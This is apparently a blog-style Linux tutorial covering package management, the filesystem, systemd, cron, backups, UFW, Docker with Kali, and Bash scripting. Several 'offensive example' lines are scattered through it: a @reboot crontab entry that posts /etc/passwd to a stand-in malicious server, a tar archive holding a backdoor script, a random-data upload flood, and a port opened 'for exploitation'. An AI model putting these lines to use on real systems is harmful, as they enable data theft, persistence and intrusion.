Linux Basics for Hackers, Developers, and System Administrators

In this guide, I will cover essential Linux concepts, from basic commands to advanced system management. First, I will explain the significance of Linux in various domains like servers, development, cybersecurity, and embedded systems.

Then, I will walk you through setting up different desktop environments, installing software with APT, and managing services using systemctl. You’ll also learn about cron jobs for automating tasks and exploring tools like docker, nmap, iptables, and htop. Further, we’ll dive into scripting with Bash, including variable management, loops, and functions, and I will also highlight important backup strategies and security tools like UFW.

Here’s why Linux is indispensable:

Servers: Most web servers, enterprise servers, and cloud platforms rely on Linux due to its reliability and performance.Development: Linux provides an unparalleled development environment, complete with extensive tools, libraries, and support for multiple programming languages.Cybersecurity: Penetration testers and bug bounty hunters also use Linux for its customizable environment and advanced tools like Metasploit, Burp Suite, and Nmap.Embedded Systems: Linux powers IoT devices, Android smartphones, smart appliances, and industrial systems.Personal Computing: Loved by developers and tech enthusiasts for its customizability, lightweight distributions, and open-source ethos.

Linux offers a variety of desktop environments (DEs), catering to different use cases and preferences:

KDE Plasma: A feature-rich and highly customizable DE.GNOME: A modern and minimalist DE with a focus on usability.XFCE: Lightweight and ideal for older hardware or users prioritizing speed.Cinnamon: Provides a traditional desktop experience with modern features.Update the system:sudo apt update && sudo apt upgradeInstall KDE Plasma:sudo apt install kde-plasma-desktopReboot the system:sudo reboot

Select “Plasma” at the login screen.

APT (Advanced Package Tool) is a package management system for Debian-based distributions like Ubuntu. It simplifies software installation, upgrades, and management.

Update package lists:sudo apt updateUpgrade installed packages:sudo apt upgradeInstall a package:sudo apt install package_nameRemove a package:sudo apt remove package_nameClean up unused packages:sudo apt autoremoveSearch for a package:apt search package_nameView package details:apt show package_name

The Linux file system is the backbone of the operating system, organizing data in a structured hierarchy. It follows the Filesystem Hierarchy Standard (FHS), which defines specific purposes for directories.

Here’s a broad overview:

Directories and Their Functions

/ (Root Directory): The base of the file system, containing all other directories./home: Stores personal files, settings, and user-specific data. Each user gets a subdirectory (e.g., /home/user)./etc: Houses system-wide configuration files. For example, hosts and passwd./var: Contains variable data like logs (/var/log), spools, and caches./usr: Contains user-installed software, libraries, and documentation. Common subdirectories include /usr/bin (binaries) and /usr/share (shared data)./tmp: A temporary directory where applications and the system can store transient files./boot: Includes bootloader files like the Linux kernel and grub configurations./dev: Contains device files, which represent hardware like disks (/dev/sda) and peripherals./proc and /sys: Virtual filesystems that provide runtime information about the system and kernel parameters./opt: Reserved for optional, third-party software packages./root: The home directory for the root (administrative) user.

File Permissions

Every file and directory in Linux has associated permissions for read, write, and execute operations. Permissions are assigned to the owner, group, and others, with commands like chmod, chown, and ls -l used for management.

Filesystem Types

Linux supports various filesystems, including:

ext4: The most commonly used filesystem in modern Linux distributions.xfs: Designed for high-performance and scalability.btrfs: A modern filesystem with snapshot and error detection capabilities.vfat/NTFS: For interoperability with Windows systems.

Mounting and Partitioning

Drives and partitions in Linux are not automatically accessible; they must be mounted to directories (mount points). For example, /mnt and /media are commonly used for mounting removable drives. Commands like mount, umount, and df are used to manage and view mounted filesystems.

Important Commands

ls: List files in a directory.cd: Change the current directory.pwd: Display the present working directory.df: Show disk usage statistics.du: Display space used by files and directories.find: Search for files in the filesystem.

systemctl: Manage systemd services

systemctl is a powerful command to control system services and processes managed by systemd. It allows you to start, stop, enable, disable, and check the status of services.

Restart a service:systemctl restart apache2

Restarts the Apache web server service.

Check the status of a service:systemctl status apache2

Displays detailed information about the service’s current state.

Enable a service at boot:systemctl enable apache2

Configures the service to start automatically during boot.

Disable a service at boot:systemctl disable apache2Prevents the service from starting at boot.

journalctl allows you to query and view logs collected by systemd's journal service. This is useful for debugging and monitoring system behavior.

View logs for a specific service:journalctl -u apache2

Displays logs associated with the Apache web server service.

View logs from the last boot:journalctl -b

Shows logs from the most recent boot session.

Follow real-time logs:journalctl -f

Continuously displays new log entries as they are recorded.

cron is a job scheduler that runs tasks at specified times or intervals. The configuration for each user is stored in a crontab file.

Edit the crontab file:crontab -e

Opens the crontab editor for the current user to schedule tasks.

Common syntax for scheduling tasks:* * * * * /path/to/command
| | | | |
| | | | +-- Day of the week (0 - 7) (Sunday = 0 or 7)
| | | +---- Month (1 - 12)
| | +------ Day of the month (1 - 31)
| +-------- Hour (0 - 23)
+---------- Minute (0 - 59)Example:0 3 * * * /usr/bin/backup.sh

Runs backup.sh every day at 3:00 AM.

Malicious Crontab Example:@reboot curl -X POST -d "$(cat /etc/passwd)" http://malicious-server.com

This will exfiltrate /etc/passwd.

Privilege Escalation Example:* * * * * root /usr/local/bin/vulnerable_script.sh

Exploit writable script executed with root privileges.

Resources for crontab:Crontab Guru: An online editor and interpreter for crontab expressions.man 5 crontab: Built-in Linux manual page for detailed syntax and options.

While cron handles scheduled tasks, sometimes you need tools for long-running tasks or session persistence. Two popular alternatives are:

screen: Allows you to create, detach, and reattach terminal sessions.Start a new session:screenDetach a session: Press Ctrl+A, then D.Reattach to a session:screen -rtmux: A more modern alternative to screen with advanced features for managing terminal sessions.Start a new session:tmux new -s session_nameDetach a session: Press Ctrl+B, then D.Reattach to a session:tmux attach-session -t session_name

df is used to display information about file system disk space usage.

Display disk usage in human-readable format:df -h

Outputs disk space usage for all mounted file systems in a human-readable format (e.g., GB or MB).

Check disk usage for a specific directory or device:df -h /home

Shows the disk usage statistics for the /home directory.

nmap: Perform network scans.nmap -sV 192.168.1.1tcpdump: Analyze network packets.tcpdump -i eth0iptables: Configure the firewall.iptables -A INPUT -p tcp --dport 22 -j ACCEPThtop: Interactive process monitoring.htopkill: Terminate processes.kill -9 1337nice: Adjust process priority.nice -n 10 commandSearch text patterns in files.grep "pattern" file_name
grep -i "pattern" file_name # Case-insensitiveSearch for a specific word in a file:grep "error" /var/log/syslogSearch recursively in all files within a directory:grep -r "TODO" /path/to/codeDisplay line numbers with matches:grep -n "user" /etc/passwdInvert match to show lines that do not contain the pattern:grep -v "127.0.0.1" /etc/hostsHighlight matched patterns:grep --color=auto "root" /etc/passwdCount occurrences of a pattern:grep -c "ssh" /var/log/auth.logMatch whole words only:grep -w "sudo" /etc/groupSearch multiple patterns:grep -Ei "(error|fail)" /var/log/syslogSearch patterns from a file:grep -f patterns.txt /var/log/messages

Recovery

Boot into Recovery Mode: Access GRUB during boot by pressing Shift. Select recovery mode to troubleshoot.Reset Root Password:

First, boot into recovery mode.

Remount the filesystem as writable:mount -o remount,rw /Change the root password:passwd rootList Running Processes:ps auxCheck Network Connections:netstat -an | grep ESTABLISHEDScan for Malware:chkrootkit

Backup and disaster recovery are critical responsibilities especially for system administrators to ensure data safety, system availability, and business continuity in the event of system failures, data corruption, or cyberattacks. Here’s an in-depth look:

Types of Backups

Full Backup

Copies all files and data in the system.Suitable for initial backups or critical points but resource-intensive.Example Command:rsync -av /source /backup/full_backup/Use case: Initial deployment or before major upgrades.

Incremental Backup

Backs up only the files that have changed since the last backup.Example Command:rsync -av --compare-dest=/backup/full_backup/ /source /backup/incremental_backup/Use case: Frequent backups with reduced storage and time requirements.

Differential Backup

Backs up changes since the last full backup.Example Command:rsync -av --compare-dest=/backup/full_backup/ /source /backup/differential_backup/Use case: Restoring data quickly with fewer dependencies compared to incremental backups.Snapshot BackupCaptures the system’s state at a specific point in time. Often used with filesystems like Btrfs, ZFS, or LVM.Example Command:lvcreate -L 5G -s -n backup_snapshot /dev/vg0/lv0Use case: Quickly restore data or test updates without affecting production data.

Backup Tools

Rsync:

Ideal for syncing directories locally or remotely.Example: Backup home directories while excluding certain files:rsync -av --exclude '*.tmp' /home /backup/home_backup/Features: Incremental backups, compression, and bandwidth control.

BorgBackup:

A deduplicating backup tool with encryption and compression.Example:borg init --encryption=repokey /path/to/repo
borg create /path/to/repo::backup-{now:%Y-%m-%d} /important/dataFeatures: Efficient storage for repeated backups and secure encryption.DuplicityEncrypted, incremental backups for local or cloud storage.Example:duplicity /source file:///backupFeatures: GPG encryption and cloud integration (AWS, Google Drive, etc.).

Restic:

Cross-platform backup tool that supports encryption and deduplication.Example:restic init -r /backup/repository
restic backup /dataFeatures: Fast and portable backups.

Tar for Archiving

A classic utility for creating archives.Example: Compress a directory for backup:tar -czvf backup.tar.gz /important/data

Offensive Example:

Exploit tar files with malicious payloads:tar -cvf malicious.tar --owner=root --group=root /tmp/backdoor.sh

Scheduling Backups

Automate backups using cron or systemd timers.

Example Cron Job:
Schedule a daily backup at midnight:

0 0 * * * rsync -av /source /backup >> /var/log/backup.log 2>&1

Systemd Timer Example:
Create a timer and service to run backups:

Service File (/etc/systemd/system/backup.service):

[Unit]
Description=Daily Backup

[Service]
ExecStart=/usr/bin/rsync -av /source /backup

Timer File (/etc/systemd/system/backup.timer):

[Unit]
Description=Daily Backup Timer

[Timer]
OnCalendar=*-*-* 00:00:00
Persistent=true

[Install]
WantedBy=timers.target

Enable and start the timer:

systemctl enable backup.timer
systemctl start backup.timer

Testing Disaster Recovery

Regularly test your backups to ensure data can be restored as expected.

Verify Backup Integrity:

Example: Use borg to verify backups:borg check /path/to/repo

Simulate Recovery Scenarios:

Restore files to a test environment to verify integrity:rsync -av /backup /test_recovery/

Bootable Backup Media:

Create a bootable backup of the system:dd if=/dev/sda of=/backup/system_image.img bs=4M

Offensive Example: Generate junk data and upload to an API (for testing or malicious intent):

dd if=/dev/urandom bs=1M count=10 | curl -X POST -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" -H "Content-Type: application/octet-stream" --data-binary @- http://example.com/api/upload

Explanation: Here, dd creates 10 MB of random data using /dev/urandom, and curl uploads it to an API endpoint. This can simulate stress testing or, if misused, could be part of a malicious attack to overwhelm a server.

Advanced Backup

Offsite Backups:

Use cloud storage (e.g., AWS S3, Google Cloud) or external drives for redundancy.Example: Sync to AWS S3 using the AWS CLI:aws s3 sync /backup s3://yourbucketname

Database Backups:

Use database-specific tools like mysqldump for MySQL:mysqldump -u root -p database_name > database_backup.sql

Version Control for Configuration Files:

Use Git to track and back up critical configuration files:git init /etc/config_repo
cd /etc/config_repo
git add /etc/nginx/nginx.conf
git commit -m "Initial config backup"

Immutable Backups:

Use object storage or write-once-read-many (WORM) backups for tamper-proof data retention.

Linux is known for its security features, making it a top choice for servers, developers, and cybersecurity professionals. By properly learning these built-in tools and best practices, you can secure your Linux system against a wide range of threats.

User and Permission Management

Linux enforces strict user permissions with ownership and access control for files and processes.Commands like chmod, chown, and umask allow you to manage access to files and directories.Use groups to organize user permissions and avoid assigning unnecessary privileges to individual users.

SSH Security

Best Practices:

Disable root login (PermitRootLogin no in /etc/ssh/sshd_config).Use SSH key authentication instead of passwords.Change the default SSH port to avoid automated attacks.
Example:sudo ssh-keygen -t rsa -b 4096 # Generate SSH key

Mandatory Access Control (MAC)

Tools like SELinux and AppArmor add an extra layer of security by restricting application permissions.

Example:sudo setenforce 1 # Enable SELinux enforcing mode
sudo aa-status # Check AppArmor status

Intrusion Detection and Prevention

Use tools like fail2ban to prevent brute-force attacks.
Example:

sudo apt install fail2ban
sudo systemctl enable fail2banRegularly scan logs using journalctl or tools like logwatch.Keep the system up-to-date with the latest security patches using package managers:sudo apt update && sudo apt upgrade

The Uncomplicated Firewall (UFW) is a simple, user-friendly CLI tool for managing iptables on Linux systems. It’s commonly used to manage firewall rules and enhance system security with minimal effort.

Installation and Setup

Check if UFW is installed:ufw --versionInstall UFW (if not installed):sudo apt install ufwEnable UFW:sudo ufw enableDisable UFW:sudo ufw disableCheck UFW status:sudo ufw status sudo ufw status verbose

Basic Rules

Allow specific port:sudo ufw allow 22Allow port with protocol (TCP/UDP):sudo ufw allow 80/tcp sudo ufw allow 53/udpAllow port range:sudo ufw allow 1000:2000/tcpDeny specific port:sudo ufw deny 23Remove a rule:sudo ufw delete allow 22Enable logging (recommended for debugging):sudo ufw logging on

Advanced Rules

Allow traffic from a specific IP:sudo ufw allow from 192.168.1.100Allow traffic from a specific IP to a port:sudo ufw allow from 192.168.1.100 to any port 22Deny traffic from a specific IP:sudo ufw deny from 203.0.113.0Allow traffic to a specific network range:sudo ufw allow from 192.168.1.0/24Limit connections to prevent brute force attacks:sudo ufw limit sshThe limit rule allows a maximum of 6 connections in 30 seconds from an IP. Beyond this, the IP will be blocked temporarily.

Service-Based Rules

UFW uses predefined application profiles stored in /etc/ufw/applications.d/.

List all available application profiles:sudo ufw app listAllow a service by its profile name:sudo ufw allow 'Apache'View details of an application profile:sudo ufw app info 'Apache Full'

Default Policies

Set default to deny all incoming traffic:sudo ufw default deny incomingSet default to allow all outgoing traffic:sudo ufw default allow outgoingSet default to deny all outgoing traffic:sudo ufw default deny outgoing

Rule Management

View numbered rules (for editing):sudo ufw status numberedDelete a specific rule by number:sudo ufw delete [rule_number]

Testing UFW Rules

Simulate rule application without enabling UFW:sudo ufw enable --dry-runCheck logs for blocked connections:sudo tail -f /var/log/ufw.log

Offensive Example

Open unnecessary ports for exploitation:

sudo ufw allow 1337/tcp

Virtualization and containerization allow you to create isolated environments for running applications or entire systems. Docker is a popular tool for containerization, and here’s how you can create a Kali Linux container.

Installing Docker

Install Docker on your Linux system:sudo apt update
sudo apt install docker.io
sudo systemctl start docker
sudo systemctl enable docker

Pulling a Kali Linux Docker Image

Docker Hub provides prebuilt images, including Kali Linux:sudo docker pull kalilinux/kali-rolling

Running a Kali Linux Container

Start a new Kali Linux container:sudo docker run -it kalilinux/kali-rolling /bin/bash

This launches an interactive shell within the container, giving you access to a Kali environment.

Persisting Changes in Containers

To save changes made in a container, you can commit it to a new image:sudo docker commit <container_id> my_kali_imageRestart the container later with:sudo docker run -it my_kali_image /bin/bash

Using Docker for Penetration Testing

Containers can isolate tools like Metasploit, Nmap, and Burp Suite. For instance, you can use the pre-installed tools in the Kali Linux image to scan and test networks without affecting the host system.

Advantages of Containers over Virtual Machines

Lightweight: Containers use fewer resources than full virtual machines.Portability: Containers can run consistently across different environments.Isolation: Applications run in isolated environments, reducing the risk of interference.

Creating a Script

Open a file in a text editor:nano script.shAdd the following code:#!/bin/bash
echo "Hello, World!"Make the script executable:chmod +x script.shRun the script:./script.sh

Variables and Parameters

Defining and using variables:name="Lyn"
echo "Hello, $name!"Reading input from the user:echo "Enter your name:"
read user_name
echo "Hello, $user_name!"Using command-line arguments:echo "Script name: $0"
echo "First argument: $1"
echo "All arguments: $@"

Conditional Statements

If-else example:if [ -f file.txt ]; then
echo "file.txt exists"
else
echo "file.txt does not exist"
fiCase statement:case $1 in
start)
echo "Starting the process..."
;;
stop)
echo "Stopping the process..."
;;
restart)
echo "Restarting the process..."
;;
*)
echo "Usage: $0 {start|stop|restart}"
;;
esac

Loops

For loop example:for i in {1..5}; do
echo "Iteration $i"
doneWhile loop:count=1
while [ $count -le 5 ]; do
echo "Count: $count"
count=$((count + 1))
doneLoop through files:for file in *.txt; do
echo "Processing $file"
done

Functions

Defining and calling functions:my_function() {
echo "This is a function"
}

my_function

Function with parameters:greet() {
echo "Hello, $1!"
}

greet "Lyn"

Return values from functions:add() {
result=$(( $1 + $2 ))
return $result
}

add 3 5
echo "Sum: $?"

Logging with timestamps:log_message() {
echo "$(date +'%Y-%m-%d %H:%M:%S') - $1" >> script.log
}

log_message "Script started"

Error handling with traps:trap 'echo "An error occurred at line $LINENO"; exit 1' ERR
echo "This will run smoothly"
false # Simulate an errorParallel execution with background processes:task() {
sleep 2
echo "Task $1 completed"
}

for i in {1..5}; do
task $i &
done

wait
echo "All tasks completed"

Processing CSV files:while IFS=',' read -r column1 column2 column3; do
echo "Col1: $column1, Col2: $column2, Col3: $column3"
done < data.csvCreating and using arrays:fruits=("apple" "banana" "cherry")
for fruit in "${fruits[@]}"; do
echo "Fruit: $fruit"
doneFile operations:if [ -e "file.txt" ]; then
echo "File exists"
else
echo "File does not exist, creating it..."
echo "Hello, file!" > file.txt
fi

This guide has equipped you with a comprehensive set of Linux skills that can be applied in multiple fields, from system administration to cybersecurity. By mastering commands for system management, automating tasks, and creating efficient backups, you’re ready to leverage Linux for various real-world applications. The flexibility and power of Linux are at your fingertips, whether you’re working with servers, desktops, or embedded systems. Embrace the open-source environment, and you’ll have the foundation to solve complex problems and streamline your workflow.